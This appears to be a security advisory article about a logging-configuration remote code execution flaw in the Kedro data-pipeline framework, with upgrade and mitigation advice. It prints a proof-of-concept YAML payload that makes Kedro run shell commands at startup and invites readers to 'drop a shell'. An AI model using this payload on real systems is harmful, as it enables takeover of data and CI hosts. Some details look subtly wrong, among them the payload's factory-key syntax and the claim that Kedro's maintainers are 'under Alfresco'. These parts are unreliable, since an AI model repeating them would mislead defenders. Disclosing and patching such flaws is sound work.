Kedro, the open-source Python framework for building reproducible data pipelines, ships with a critical remote code execution vulnerability. Attackers can trigger arbitrary command execution at startup by manipulating the KEDRO_LOGGING_CONFIG environment variable. Upgrade to version 1.3.0 now—it’s the only full fix.
This flaw affects all prior versions. Kedro pulls logging configuration from a file specified by that environment variable, then feeds it directly into Python’s logging.config.dictConfig() without checks. Python’s logging system lets configs include a () key, which instantiates any callable with arbitrary arguments. Craft a YAML file like this, point KEDRO_LOGGING_CONFIG to it, and Kedro executes your payload on load:
version: 1
disable_existing_loggers: false
formatters:
default:
(): [os, system]
args: ['id && whoami']
handlers:
console:
class: logging.StreamHandler
formatter: default
stream: ext://sys.stdout
root:
level: INFO
handlers: [console]
Run os.system('id && whoami') or drop a shell—your choice. No authentication required if the env var is reachable.
Why This Hits Hard
Kedro targets data engineers and ML teams at firms like QuantumBlack (McKinsey-owned). It structures pipelines for reproducibility, often in CI/CD, Docker, or cloud runs. GitHub shows 1,200+ stars and 100k+ downloads monthly via PyPI. Teams deploy it in Kubernetes, AWS SageMaker, or GitHub Actions—environments where env vars are set dynamically.
Implications cut deep. An attacker with env var write access—say, via CI secrets, shared infra, or compromised upstream—owns the host. In ML workflows, this means data exfil, model poisoning, or lateral movement. Finance and crypto shops using Kedro for analytics face amplified risk: leaked keys, tampered trades. We’ve seen similar Python logging RCEs before, like in Celery (CVE-2023-41258) or structlog misconfigs. Python’s flexibility bites when unvalidated.
Skeptical take: Exposure depends on your setup. If you hardcode logging and lock env vars, risk drops. But defaults invite trouble—Kedro docs push KEDRO_LOGGING_CONFIG for overrides. No CVSS score yet, but it’s pre-auth RCE: critical by any metric.
Fix It
Patch lands in Kedro 1.3.0 (released October 2024). It scans configs upfront, rejects any () keys before dictConfig(). Verify with:
$ pip install kedro==1.3.0
$ kedro --version
Test your pipelines post-upgrade. No breaking changes reported.
Can’t upgrade? Layer defenses:
- Block untrusted control of
KEDRO_LOGGING_CONFIG—audit CI YAML, Dockerfiles, .env files. - Lock write access to config dirs (e.g.,
chmod 644 conf/logging.yml). - Skip dynamic configs; stick to built-ins.
- Validate YAML manually: grep for
'()'or use a schema checker likeyamllintwith custom rules.
These blunt the edge but leave gaps—dictConfig() has other tricks, like filters or nested callables.
Broader lesson: Vet env vars in data tools. Kedro’s maintainers (now under Alfresco) acted fast post-disclosure. Still, scan deps with pip-audit or Snyk. In security-conscious stacks—crypto exchanges, banks—treat logging as hostile input. This vuln underscores supply chain perils: one bad config in a pipeline cascades.
Bottom line: If Kedro’s in your stack, patch today. Delay invites exploits. Track GitHub advisory for updates—stay sharp.